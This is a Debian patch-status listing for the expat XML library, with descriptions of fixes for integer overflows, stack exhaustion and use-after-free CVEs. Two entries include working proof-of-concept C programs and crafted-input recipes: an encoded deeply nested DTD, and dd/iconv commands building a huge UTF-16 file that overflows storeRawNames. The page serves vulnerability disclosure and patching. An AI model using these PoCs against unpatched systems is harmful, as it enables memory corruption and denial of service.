Debian Patches

Status for expat/2.2.10-2+deb11u6

Patch Description Author Forwarded Bugs Origin Last update
lib-Detect-and-prevent-troublesome-left-shifts-in-fu.patch lib: Detect and prevent troublesome left shifts in function storeAtts (CVE-2021-45960) Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/0adcb34c49bee5b19bd29b16a578c510c23597ea 2021-12-27
lib-Prevent-integer-overflow-on-m_groupSize-in-funct.patch lib: Prevent integer overflow on m_groupSize in function doProlog (CVE-2021-46143) Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/85ae9a2d7d0e9358f356b33977b842df8ebaec2b 2021-12-25
lib-Prevent-integer-overflow-at-multiple-places-CVE-.patch lib: Prevent integer overflow at multiple places (CVE-2022-22822 to CVE-2022-22827)

The involved functions are:
- addBinding (CVE-2022-22822)
- build_model (CVE-2022-22823)
- defineAttribute (CVE-2022-22824)
- lookup (CVE-2022-22825)
- nextScaffoldPart (CVE-2022-22826)
- storeAtts (CVE-2022-22827)
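
Overflows of this kind are commonly prevented by validating a size computation before it reaches the allocator. The following is a minimal sketch of that general pattern, not the upstream patch; `checked_array_bytes` and `alloc_array` are hypothetical names that do not exist in Expat.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Hypothetical helper, not part of Expat: computes count * elem_size
   and reports failure instead of silently wrapping around. */
static int checked_array_bytes(size_t count, size_t elem_size, size_t *out) {
  if (elem_size != 0 && count > SIZE_MAX / elem_size)
    return 0; /* the product would not fit in size_t */
  *out = count * elem_size;
  return 1;
}

/* Allocates an array only when its byte count is representable. */
static void *alloc_array(size_t count, size_t elem_size) {
  size_t bytes;
  if (!checked_array_bytes(count, elem_size, &bytes))
    return NULL;
  return malloc(bytes);
}
```

The check divides rather than multiplies, so the test itself cannot overflow.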
Sebastian Pipping <sebastian@pipping.org> no debian https://github.com/libexpat/libexpat/commit/9f93e8036e842329863bf20395b8fb8f73834d9e 2021-12-30
lib-Detect-and-prevent-integer-overflow-in-XML_GetBu.patch lib: Detect and prevent integer overflow in XML_GetBuffer (CVE-2022-23852) Samanta Navarro <ferivoz@riseup.net> no https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40 2022-01-22
tests-Cover-integer-overflow-in-XML_GetBuffer-CVE-20.patch tests: Cover integer overflow in XML_GetBuffer (CVE-2022-23852) Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/acf956f14bf79a5e6383a969aaffec98bfbc2e44 2022-01-23
lib-Prevent-integer-overflow-in-doProlog-CVE-2022-23.patch lib: Prevent integer overflow in doProlog (CVE-2022-23990)
The change from "int nameLen" to "size_t nameLen"
addresses the overflow on "nameLen++" in code
"for (; name[nameLen++];)" right above the second
change in the patch.
Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/ede41d1e186ed2aba88a06e84cac839b770af3a1 2022-01-26
Prevent-stack-exhaustion-in-build_model.patch Prevent stack exhaustion in build_model
It is possible to trigger stack exhaustion in build_model function if
depth of nested children in DTD element is large enough. This happens
because build_node is a recursively called function within build_model.

The code has been adjusted to run iteratively. It uses the already
allocated heap space as temporary stack (growing from top to bottom).

Output is identical to recursive version. No new fields in data
structures were added, i.e. it keeps full API and ABI compatibility.
Instead the numchildren variable is used to temporarily keep the
index of items (uint vs int).

Documentation and readability improvements kindly added by Sebastian.

Proof of Concept:

1. Compile poc binary which parses XML file line by line

```
cat > poc.c << EOF
#include <err.h>
#include <expat.h>
#include <stdio.h>
#include <stdlib.h>

XML_Parser parser;

/* Frees the content model that Expat hands to the handler. */
static void XMLCALL
dummy_element_decl_handler(void *userData, const XML_Char *name,
                           XML_Content *model) {
  XML_FreeContentModel(parser, model);
}

int main(int argc, char *argv[]) {
  FILE *fp;
  char *p = NULL;
  size_t s = 0;
  ssize_t l;
  if (argc != 2)
    errx(1, "usage: poc poc.xml");
  if ((parser = XML_ParserCreate(NULL)) == NULL)
    errx(1, "XML_ParserCreate");
  XML_SetElementDeclHandler(parser, dummy_element_decl_handler);
  if ((fp = fopen(argv[1], "r")) == NULL)
    err(1, "fopen");
  /* Feed the file to the parser one line at a time. */
  while ((l = getline(&p, &s, fp)) > 0)
    if (XML_Parse(parser, p, (int)l, XML_FALSE) != XML_STATUS_OK)
      errx(1, "XML_Parse");
  XML_ParserFree(parser);
  free(p);
  fclose(fp);
  return 0;
}
EOF
cc -std=c11 -D_POSIX_C_SOURCE=200809L -o poc poc.c -lexpat
```

2. Create XML file with a lot of nested groups in DTD element

```
cat > poc.xml.zst.b64 << EOF
KLUv/aQkACAAPAEA+DwhRE9DVFlQRSB1d3UgWwo8IUVMRU1FTlQgdXd1CigBAHv/58AJAgAQKAIA
ECgCABAoAgAQKAIAECgCABAoAgAQKHwAAChvd28KKQIA2/8gV24XBAIAECkCABApAgAQKQIAECkC
ABApAgAQKQIAEClVAAAgPl0+CgEA4A4I2VwwnQ==
EOF
base64 -d poc.xml.zst.b64 | zstd -d > poc.xml
```

3. Run Proof of Concept

```
./poc poc.xml
```
Samanta Navarro <ferivoz@riseup.net> yes upstream https://github.com/libexpat/libexpat/commit/9b4ce651b26557f16103c3a366c91934ecd439ab 2022-02-15
Prevent-integer-overflow-in-storeRawNames.patch Prevent integer overflow in storeRawNames
It is possible to use an integer overflow in storeRawNames for out of
boundary heap writes. Default configuration is affected. If compiled
with XML_UNICODE then the attack does not work. Compiling with
-fsanitize=address confirms the following proof of concept.

The problem can be exploited by abusing the m_buffer expansion logic.
Even though the initial size of m_buffer is a power of two, eventually
it can end up a little bit lower, thus allowing allocations very close
to INT_MAX (since INT_MAX/2 can be surpassed). This means that tag
names can be parsed which are almost INT_MAX in size.

Unfortunately (from an attacker's point of view) INT_MAX/2 is also a
limitation in string pools. Having a tag name of INT_MAX/2 characters
or more is not possible.

Expat can convert between different encodings. UTF-16 documents which
contain only ASCII representable characters are twice as large as their
ASCII encoded counterparts.

The proof of concept works by taking these three considerations into
account:

1. Move the m_buffer size slightly below a power of two by having a
short root node <a>. This allows the m_buffer to grow very close
to INT_MAX.
2. The string pooling forbids tag names longer than or equal to
INT_MAX/2, so keep the attack tag name smaller than that.
3. To be able to still overflow INT_MAX even though the name is
limited at INT_MAX/2-1 (nul byte) we use UTF-16 encoding and a tag
which only contains ASCII characters. UTF-16 always stores two
bytes per character while the tag name is converted to using only
one. Our attack node byte count must be a bit higher than
2/3 INT_MAX so the converted tag name is around INT_MAX/3 which
in sum can overflow INT_MAX.

Thanks to our small root node, m_buffer can handle 2/3 INT_MAX bytes
without running into INT_MAX boundary check. The string pooling is
able to store INT_MAX/3 as tag name because the amount is below
INT_MAX/2 limitation. And creating the sum of both eventually overflows
in storeRawNames.
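
The arithmetic can be checked with a small model. This is a simplified sketch, not the code in storeRawNames: the helper names are hypothetical, alignment padding is ignored, and a 32-bit `int` is assumed.

```c
#include <limits.h>

/* Simplified model of the sizes described above; the real code also
   accounts for alignment, which is ignored here. */

/* Bytes of the raw tag name as it sits in the UTF-16 input. */
static long long raw_name_bytes(long long name_chars) {
  return 2 * name_chars;
}

/* Bytes of the converted name: one per ASCII character plus the nul. */
static long long converted_name_bytes(long long name_chars) {
  return name_chars + 1;
}

/* Returns 1 if the converted name stays below the INT_MAX/2 string
   pool limit while the combined size no longer fits in an int. */
static int sum_overflows_int(long long name_chars) {
  long long total =
      raw_name_bytes(name_chars) + converted_name_bytes(name_chars);
  return converted_name_bytes(name_chars) < INT_MAX / 2 && total > INT_MAX;
}
```

Assuming the tag name in the proof of concept below spans offsets 4 to 805306367 of the UTF-8 file, it has 805306364 characters. The raw UTF-16 name then takes 1610612728 bytes, which is still below INT_MAX, yet the sum with the converted name exceeds INT_MAX.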

Proof of Concept:

1. Compile expat with -fsanitize=address.

2. Create Proof of Concept binary which iterates through input
file 16 MB at once for better performance and easier integer
calculations:

```
cat > poc.c << EOF
#include <err.h>
#include <expat.h>
#include <stdlib.h>
#include <stdio.h>

#define CHUNK (16 * 1024 * 1024)
int main(int argc, char *argv[]) {
  XML_Parser parser;
  FILE *fp;
  char *buf;
  int i;

  if (argc != 2)
    errx(1, "usage: poc file.xml");
  if ((parser = XML_ParserCreate(NULL)) == NULL)
    errx(1, "failed to create expat parser");
  if ((fp = fopen(argv[1], "r")) == NULL) {
    XML_ParserFree(parser);
    err(1, "failed to open file");
  }
  if ((buf = malloc(CHUNK)) == NULL) {
    fclose(fp);
    XML_ParserFree(parser);
    err(1, "failed to allocate buffer");
  }
  i = 0;
  /* Feed the file to the parser in full 16 MiB chunks. */
  while (fread(buf, CHUNK, 1, fp) == 1) {
    printf("iteration %d: XML_Parse returns %d\n", ++i,
           XML_Parse(parser, buf, CHUNK, XML_FALSE));
  }
  free(buf);
  fclose(fp);
  XML_ParserFree(parser);
  return 0;
}
EOF
gcc -fsanitize=address -o poc poc.c -lexpat
```

3. Construct specially prepared UTF-16 XML file:

```
dd if=/dev/zero bs=1024 count=794624 | tr '\0' 'a' > poc-utf8.xml
echo -n '<a><' | dd conv=notrunc of=poc-utf8.xml
echo -n '><' | dd conv=notrunc of=poc-utf8.xml bs=1 seek=805306368
iconv -f UTF-8 -t UTF-16LE poc-utf8.xml > poc-utf16.xml
```

4. Run proof of concept:

```
./poc poc-utf16.xml
```
Samanta Navarro <ferivoz@riseup.net> yes upstream https://github.com/libexpat/libexpat/commit/eb0362808b4f9f1e2345a0cf203b8cc196d776d9 2022-02-15
Prevent-integer-overflow-in-copyString.patch Prevent integer overflow in copyString
The copyString function is only used for encoding string supplied by
the library user.
Samanta Navarro <ferivoz@riseup.net> yes upstream https://github.com/libexpat/libexpat/commit/efcb347440ade24b9f1054671e6bd05e60b4cafd 2022-02-15
lib-Fix-harmless-use-of-uninitialized-memory.patch lib: Fix (harmless) use of uninitialized memory Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/6881a4fc8596307ab9ff2e85e605afa2e413ab71 2022-02-12
lib-Protect-against-malicious-namespace-declarations.patch lib: Protect against malicious namespace declarations (CVE-2022-25236) Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 2022-02-12
tests-Cover-CVE-2022-25236.patch tests: Cover CVE-2022-25236 Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/2de077423fb22750ebea599677d523b53cb93b1d 2022-02-12
lib-Drop-unused-macro-UTF8_GET_NAMING.patch lib: Drop unused macro UTF8_GET_NAMING Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/ee2a5b50e7d1940ba8745715b62ceb9efd3a96da 2022-02-08
lib-Add-missing-validation-of-encoding-CVE-2022-2523.patch lib: Add missing validation of encoding (CVE-2022-25235) Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 2022-02-08
lib-Add-comments-to-BT_LEAD-cases-where-encoding-has.patch lib: Add comments to BT_LEAD* cases where encoding has already been validated Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/c85a3025e7a1be086dc34e7559fbc543914d047f 2022-02-09
tests-Cover-missing-validation-of-encoding-CVE-2022-.patch tests: Cover missing validation of encoding (CVE-2022-25235) Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/6a5510bc6b7efe743356296724e0b38300f05379 2022-02-08
Fix-build_model-regression.patch Fix build_model regression.
The iterative approach in build_model failed to fill children arrays
correctly. A preorder traversal is not required and turned out to be the
culprit. Use an easier algorithm:

Add nodes from scaffold tree starting at index 0 (root) to the target
array whenever children are encountered. This ensures that children
are adjacent to each other. This complies with the recursive version.

Store only the scaffold index in numchildren field to prevent a direct
processing of these children, which would require a recursive solution.
This allows the algorithm to iterate through the target array from start
to end without jumping back and forth, converting on the fly.
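
The traversal described above can be sketched as follows. This is an illustration under simplifying assumptions, not the patched build_model: `ScaffoldNode`, `Node` and `build_tree` are hypothetical stand-ins, and each node carries a single `value` field in place of Expat's type, quantifier and name.

```c
#include <stddef.h>

/* Hypothetical, simplified stand-ins for Expat's scaffold and content
   structures; the field names are illustrative only. */
typedef struct {
  int value;         /* payload of the node */
  int firstchild;    /* scaffold index of the first child, or -1 */
  int nextsib;       /* scaffold index of the next sibling, or -1 */
  unsigned childcnt; /* number of children */
} ScaffoldNode;

typedef struct Node {
  int value;
  unsigned numchildren;
  struct Node *children;
} Node;

/* Fills dest, which must have room for every scaffold node, starting
   from scaffold[0] and without recursion. */
static void build_tree(const ScaffoldNode *scaffold, Node *dest) {
  Node *next_free = dest + 1; /* next unused slot in dest */
  dest[0].numchildren = 0;    /* temporarily holds the root's scaffold index */
  for (Node *cur = dest; cur < next_free; cur++) {
    /* Convert the stored scaffold index into the real node on the fly. */
    const ScaffoldNode *src = &scaffold[cur->numchildren];
    cur->value = src->value;
    cur->numchildren = src->childcnt;
    cur->children = src->childcnt ? next_free : NULL;
    /* Reserve adjacent slots for the children and remember only their
       scaffold indices; they are converted when cur reaches them. */
    for (int c = src->firstchild; c != -1; c = scaffold[c].nextsib) {
      next_free->numchildren = (unsigned)c;
      next_free++;
    }
  }
}
```

Because every slot is written before the cursor reaches it, a single forward pass over the target array suffices and stack depth stays constant regardless of nesting.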
Samanta Navarro <ferivoz@riseup.net> yes upstream https://github.com/libexpat/libexpat/commit/b12f34fe32821a69dc12ff9a021daca0856de238 2022-02-19
tests-Protect-against-nested-element-declaration-mod.patch tests: Protect against nested element declaration model regressions Sebastian Pipping <sebastian@pipping.org> yes upstream https://github.com/libexpat/libexpat/commit/154e565f6ef329c9ec97e6534c411ddde0b320c8 2022-02-20
lib-Relax-fix-to-CVE-2022-25236-with-regard-to-RFC-3.patch lib: Relax fix to CVE-2022-25236 with regard to RFC 3986 URI characters Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/2ba6c76fca21397959145e18c5ef376201209020 2022-02-27
tests-Cover-relaxed-fix-to-CVE-2022-25236.patch tests: Cover relaxed fix to CVE-2022-25236 Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/e0f852db1e3b1e6d34922c68a653c3cc4b85361c 2022-03-03
lib-Document-namespace-separator-effect-right-in-hea.patch lib: Document namespace separator effect right in header <expat.h> Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/5dd52182972a35f2251a07784eda35d3d52d3e07 2022-03-01
lib-doc-Add-a-note-on-namespace-URI-validation.patch lib|doc: Add a note on namespace URI validation
[Salvatore Bonaccorso: Backport to 2.2.10 for context changes]
Sebastian Pipping <sebastian@pipping.org> no https://github.com/libexpat/libexpat/commit/c57bea96b73eee1c6d5e288f0f57efbf5238e49a 2022-03-01
CVE-2022-40674.patch [PATCH] Ensure raw tagnames are safe exiting internalEntityParser
It is possible to concoct a situation in which parsing is
suspended while substituting in an internal entity, so that
XML_ResumeParser directly uses internalEntityProcessor as
its processor. If the subsequent parse includes some unclosed
tags, this will return without calling storeRawNames to ensure
that the raw versions of the tag names are stored in memory other
than the parse buffer itself. If the parse buffer is then changed
or reallocated (for example if processing a file line by line),
badness will ensue.

This patch ensures storeRawNames is always called when needed
after calling doContent. The earlier call to doContent does
not need the same protection; it only deals with entity
substitution, which cannot leave unbalanced tags, and in any
case the raw names will be pointing into the stored entity
value not the parse buffer.
Rhodri James <rhodri@wildebeest.org.uk> no 2022-08-17
CVE-2022-40674_addon.patch [PATCH 1/2] tests: Cover heap use-after-free issue in doContent Sebastian Pipping <sebastian@pipping.org> no 2022-09-11
lib-Fix-overeager-DTD-destruction-in-XML_ExternalEnt.patch lib: Fix overeager DTD destruction in XML_ExternalEntityParserCreate Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/5290462a7ea1278a8d5c0d5b2860d4e244f997e4 2022-09-20
tests-Cover-overeager-DTD-destruction-in-XML_Externa.patch tests: Cover overeager DTD destruction in XML_ExternalEntityParserCreate Sebastian Pipping <sebastian@pipping.org> yes debian upstream https://github.com/libexpat/libexpat/commit/43992e4ae25fc3dc0eec0cd3a29313555d56aee2 2022-09-19
tests-Move-triplet_start_checker-flag-check-after-isFinal.patch tests: Move triplet_start_checker flag check after isFinal=1 call
There is no guarantee that the callback will happen before the parse
call with isFinal=XML_TRUE. Let's move the assertion to a location
where we know it must have happened.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/d52b4141496bd26bd716d88c67af8f2250bd0da6 2023-08-24
tests-Set-isFinal-in-test_column_number_after_parse.patch tests: Set isFinal in test_column_number_after_parse
Without this, parsing of the end tag may be deferred, yielding an
unexpected column number.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/2cee1061e2fec10633c3f02a961dabf95e85910a 2023-08-24
tests-Set-isFinal-1-in-line-column-number-after-error-tes.patch tests: Set isFinal=1 in line/column-number-after-error tests Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/d4105a9080271a8d4996d2454f89be9992cb268a 2023-08-31
Always-consume-BOM-bytes-when-found-in-prolog.patch Always consume BOM bytes when found in prolog
The byte order mark is not correctly consumed when followed by an
incomplete token in a non-final parse. This results in the BOM staying
in the buffer, causing an invalid token error later.

This was not detected by existing tests because they either parse
everything in one call, or add a single byte at a time.

By moving `s` forward when we find a BOM, we make sure that the BOM
bytes are properly consumed in all cases.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/182bbc350ed8b3c547133a9a44a4f30a0ba3b77e 2023-08-31
tests-Add-_fail-function-and-assert_true-macro.patch tests: Add _fail() function and assert_true() macro. Guilhem Moulin <guilhem@debian.org> no https://github.com/libexpat/libexpat/commit/cce19de59f849cbee55c8c62e77481593fac1468 2024-09-11
tests-Make-test_default_current-insensitive-to-callback-c.patch tests: Make test_default_current insensitive to callback chunking
Instead of testing the exact number and sequence of callbacks, we now
test that we get the exact data lengths and sequence of callbacks. The
checks become much more verbose, but will now accept any buffer fill
strategy -- single bytes, multiple bytes, or any combination thereof.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/182bbc350ed8b3c547133a9a44a4f30a0ba3b77e 2023-08-31
tests-Look-for-single-char-match-in-test_abort_epilog.patch tests: Look for single-char match in test_abort_epilog
...instead of a full-string match.

These tests were depending on getting handler callbacks with exactly
one character of data at a time. For example, if test_abort_epilog got
"\n\r\n" in one callback, it would fail to match on the '\r', and would
not abort parsing as expected.

By searching the callback arg for the magic character rather than
expecting a full match, the test no longer depends on exact callback
timing.

`userData` is never NULL in these tests, so that check was left out of
the new version.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/4978d285d205d1238c823876134c3e486a3c2fe5 2023-08-31
tests-Run-SINGLE_BYTES-with-variously-sized-chunks.patch tests: Run SINGLE_BYTES with variously-sized chunks
The _XML_Parse_SINGLE_BYTES function currently calls XML_Parse() one
byte at a time. This is useful to detect possible parsing bugs related
to having to exit parsing, wait for more data, and resume.

This commit makes SINGLE_BYTES even more useful by repeating all tests,
changing the chunk size every time. So instead of just one byte at a
time, we now also test two bytes at a time, and so on. Tests that don't
use the SINGLE_BYTES also run multiple times, but are otherwise not
affected.

This uncovered some issues, which have been fixed in preceding commits.

On failure, the chunk size is included in the "FAIL" log prints.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/d2b31760cd5d22b26316d407789caded826857e3 2023-08-25
tests-set-isFinal-in-test_line_number_after_parse.patch tests: set isFinal in test_line_number_after_parse
Without this, parsing of the start or end tag may be deferred, yielding
an unexpected line number.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/2e1253414559d2649cbf5662496800061034eb49 2023-09-26
tests-set-isFinal-in-test_reset_in_entity.patch tests: set isFinal in test_reset_in_entity
Without this, parsing may be deferred so that the suspending callback
hasn't been called when the test checks for it.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/bb3c17198072abe89885949b85f8a0f353ac41c9 2023-09-26
tests-Remove-early-comment-count-check-in-test_user_param.patch tests: Remove early comment count check in test_user_parameters
Before a parse call with isFinal=XML_TRUE, there is no guarantee that
all supplied data has been parsed. Removing the first comment count
check removes the test's assumption of such a guarantee.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/a5993b2d42d88e1a39124117a781a055dbb0598b 2023-09-26
tests-Exit-parser_stop_character_handler-if-parser-is-fin.patch tests: Exit parser_stop_character_handler if parser is finished
When test_repeated_stop_parser_between_char_data_calls runs without
chunking the input -- which I am about to do in my next commit -- the
parser_stop_character_handler callback happens multiple times. This is
because stopping the parser doesn't stop all callbacks immediately,
which is valid (documented) behavior.

The second callback tried to stop the parser again, getting unexpected
errors. Let's check the parser status on entry and return early if it's
already finished.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/b4d2b76a97ab88854a26f4166cb294a0622144cd 2023-09-26
tests-Replace-invalid-entity-expansion-in-test_alloc_nest.patch tests: Replace invalid entity expansion in test_alloc_nested_entities

%pe2; would ultimately expand to a plain "ABCDEF...", which is not
valid in this context. This was not normally hit, since the test would
get its expected XML_ERROR_NO_MEMORY before expanding this far.

With g_chunkSize=0 and EXPAT_CONTEXT_BYTES=OFF, the number of allocs
required to reach that point becomes *just* low enough to reach the
final expansion, making the test fail with a very unexpected syntax
error.

Nesting %pe2; in another entity declaration avoids the problem.
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/7b0e27a6981014313a9f30486a0b4d2e0a3ebde3 2023-09-28
tests-Run-SINGLE_BYTES-with-no-chunking.patch tests: Run SINGLE_BYTES with no chunking
...in addition to 1-to-5-byte chunks as we've done so far.

By starting g_chunkSize at 0, we get to run all the tests that call
_XML_Parse_SINGLE_BYTES() as if they just called XML_Parse(). This
gives us extra test coverage.
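
The idea of feeding the same input in differently sized pieces can be sketched as below. This is not the test suite's _XML_Parse_SINGLE_BYTES; `feed_fn`, `feed_in_chunks` and `count_bytes` are hypothetical names, and the callback stands in for a parse call such as XML_Parse.

```c
#include <stddef.h>

/* Hypothetical callback type standing in for a parse call; it receives
   one chunk and a flag telling whether it is the last one. */
typedef int (*feed_fn)(void *ctx, const char *data, size_t len, int is_final);

/* Feeds data to fn in pieces of chunk_size bytes. A chunk_size of 0
   means a single call with all of the data. Returns the number of
   calls made, or -1 if fn reports failure by returning 0. */
static int feed_in_chunks(feed_fn fn, void *ctx, const char *data,
                          size_t len, size_t chunk_size) {
  int calls = 0;
  if (chunk_size == 0)
    chunk_size = len;
  do {
    size_t n = len < chunk_size ? len : chunk_size;
    int is_final = (n == len);
    if (!fn(ctx, data, n, is_final))
      return -1;
    calls++;
    data += n;
    len -= n;
  } while (len > 0);
  return calls;
}

/* Example callback: adds up the bytes it was given. */
static int count_bytes(void *ctx, const char *data, size_t len, int is_final) {
  (void)data;
  (void)is_final;
  *(size_t *)ctx += len;
  return 1;
}
```

Running the same test body once per chunk size, including 0, exercises both the resume-after-partial-input paths and the plain single-call path.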
Snild Dolkow <snild@sony.com> no https://github.com/libexpat/libexpat/commit/091ba48d7a5a8fcb65ba383d81d062c6e9046a88 2023-09-26
CVE-2023-52425/01-119ae27.patch Grow buffer based on current size
Until now, the buffer size to grow to has been calculated based on the
distance from the current parse position to the end of the buffer. This
means that the size of any already-parsed data was not considered,
leading to inconsistent buffer growth.

There was also a special case in XML_Parse() when XML_CONTEXT_BYTES was
zero, where the buffer size would be set to twice the incoming string
length. This patch replaces this with an XML_GetBuffer() call.

Growing the buffer based on its total size makes its growth consistent.

The commit includes a test that checks that we can reach the max buffer
size (usually INT_MAX/2 + 1) regardless of previously parsed content.

GitHub CI couldn't allocate the full 1GiB with MinGW/wine32, though it
works locally with the same compiler and wine version. As a workaround,
the test tries to malloc 1GiB, and reduces `maxbuf` to 512MiB in case
of failure.
Snild Dolkow <snild@sony.com> yes upstream https://github.com/libexpat/libexpat/commit/dcbc1436809b7cd4552ed4e929790739d08d0dca 2023-09-28
CVE-2023-52425/02-3484383.patch Add aaaaaa_*.xml with unreasonably large tokens
Some of these currently take a very long time to parse. I set those to
only run one loop in the run-benchmark make target.

4096 may be a fairly small buffer, and definitely makes the problem worse
than it otherwise would've been, but similar sizes exist in real code:

* 2048 bytes in cpython Modules/pyexpat.c
* 4096 bytes in skia SkXMLParser.cpp
* BUFSIZ bytes (8192 on my machine) in expat/examples

The files, too, are inspired by real-life examples: Android stores
depth and gain maps as base64-encoded JPEGs inside the XMP data of
other JPEGs. Sometimes as a text element, sometimes as an attribute
value. I've seen attribute values slightly over 5 MiB in size.
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/3484383fa75e0ea2aa716360088813c3b205b261 2023-08-17
CVE-2023-52425/03-9cdf9b8.patch Skip parsing after repeated partials on the same token
When the parse buffer contains the starting bytes of a token but not
all of them, we cannot parse the token to completion. We call this a
partial token. When this happens, the parse position is reset to the
start of the token, and the parse() call returns. The client is then
expected to provide more data and call parse() again.

In extreme cases, this means that the bytes of a token may be parsed
many times: once for every buffer refill required before the full token
is present in the buffer.

Math:
Assume there's a token of T bytes
Assume the client fills the buffer in chunks of X bytes
We'll try to parse X, 2X, 3X, 4X ... until mX == T (technically >=)
That's (m²+m)X/2 = (T²/X+T)/2 bytes parsed (arithmetic progression)
While it is alleviated by larger refills, this amounts to O(T²)

Expat grows its internal buffer by doubling it when necessary, but has
no way to inform the client about how much space is available. Instead,
we add a heuristic that skips parsing when we've repeatedly stopped on
an incomplete token. Specifically:

* Only try to parse if we have a certain amount of data buffered
* Every time we stop on an incomplete token, double the threshold
* As soon as any token completes, the threshold is reset

This means that when we get stuck on an incomplete token, the threshold
grows exponentially, effectively making the client perform larger buffer
fills, limiting how many times we can end up re-parsing the same bytes.

Math:
Assume there's a token of T bytes
Assume the client fills the buffer in chunks of X bytes
We'll try to parse X, 2X, 4X, 8X ... until (2^k)X == T (or larger)
That's (2^(k+1)-1)X bytes parsed -- e.g. 15X if T = 8X
This is equal to 2T-X, which amounts to O(T)
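
Both calculations can be reproduced with a small cost model. This is a sketch, not Expat code: the function names are hypothetical, each parse attempt is assumed to scan everything buffered so far, the threshold is assumed to start at one fill of X bytes, and the input is assumed to continue past the token.

```c
#include <stddef.h>

/* Without the heuristic: one parse attempt after every fill of x bytes
   until a token of t bytes is complete. */
static size_t scanned_without_heuristic(size_t t, size_t x) {
  size_t buffered = 0, scanned = 0;
  if (x == 0)
    return 0; /* no progress is possible without data */
  while (buffered < t) {
    buffered += x;
    scanned += buffered;
  }
  return scanned;
}

/* With the heuristic: attempt a parse only once the threshold is
   reached, and double the threshold whenever the attempt stops on a
   partial token. */
static size_t scanned_with_heuristic(size_t t, size_t x) {
  size_t buffered = 0, scanned = 0, threshold = x;
  if (x == 0)
    return 0;
  for (;;) {
    buffered += x;
    if (buffered < threshold)
      continue; /* parse attempt skipped */
    scanned += buffered;
    if (buffered >= t)
      return scanned; /* token complete */
    threshold *= 2;
  }
}
```

For T = 8X the model yields 36X scanned bytes without the heuristic and 15X with it, matching (m²+m)X/2 and 2T-X respectively.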

We could've chosen a faster growth rate, e.g. 4 or 8. Those seem to
increase performance further, at the cost of further increasing the
risk of growing the buffer more than necessary. This can easily be
adjusted in the future, if desired.

This is all completely transparent to the client, except for:
1. possible delay of some callbacks (when our heuristic overshoots)
2. apps that never do isFinal=XML_TRUE could miss data at the end

For the affected testdata, this change shows a 100-400x speedup.
The recset.xml benchmark shows no clear change either way.

Before:
benchmark -n ../testdata/largefiles/recset.xml 65535 3
3 loops, with buffer size 65535. Average time per loop: 0.270223
benchmark -n ../testdata/largefiles/aaaaaa_attr.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 15.033048
benchmark -n ../testdata/largefiles/aaaaaa_cdata.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.018027
benchmark -n ../testdata/largefiles/aaaaaa_comment.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 11.775362
benchmark -n ../testdata/largefiles/aaaaaa_tag.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 11.711414
benchmark -n ../testdata/largefiles/aaaaaa_text.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.019362

After:
./run.sh benchmark -n ../testdata/largefiles/recset.xml 65535 3
3 loops, with buffer size 65535. Average time per loop: 0.269030
./run.sh benchmark -n ../testdata/largefiles/aaaaaa_attr.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.044794
./run.sh benchmark -n ../testdata/largefiles/aaaaaa_cdata.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.016377
./run.sh benchmark -n ../testdata/largefiles/aaaaaa_comment.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.027022
./run.sh benchmark -n ../testdata/largefiles/aaaaaa_tag.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.099360
./run.sh benchmark -n ../testdata/largefiles/aaaaaa_text.xml 4096 3
3 loops, with buffer size 4096. Average time per loop: 0.017956
Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/9cdf9b8d77d5c2c2a27d15fb68dd3f83cafb45a1 2023-08-17
CVE-2023-52425/04-1b9d398.patch Don't update partial token heuristic on error Snild Dolkow <snild@sony.com> yes debian upstream https://github.com/libexpat/libexpat/commit/1b9d398517befeb944cbbadadf10992b07e96fa2 2023-09-04
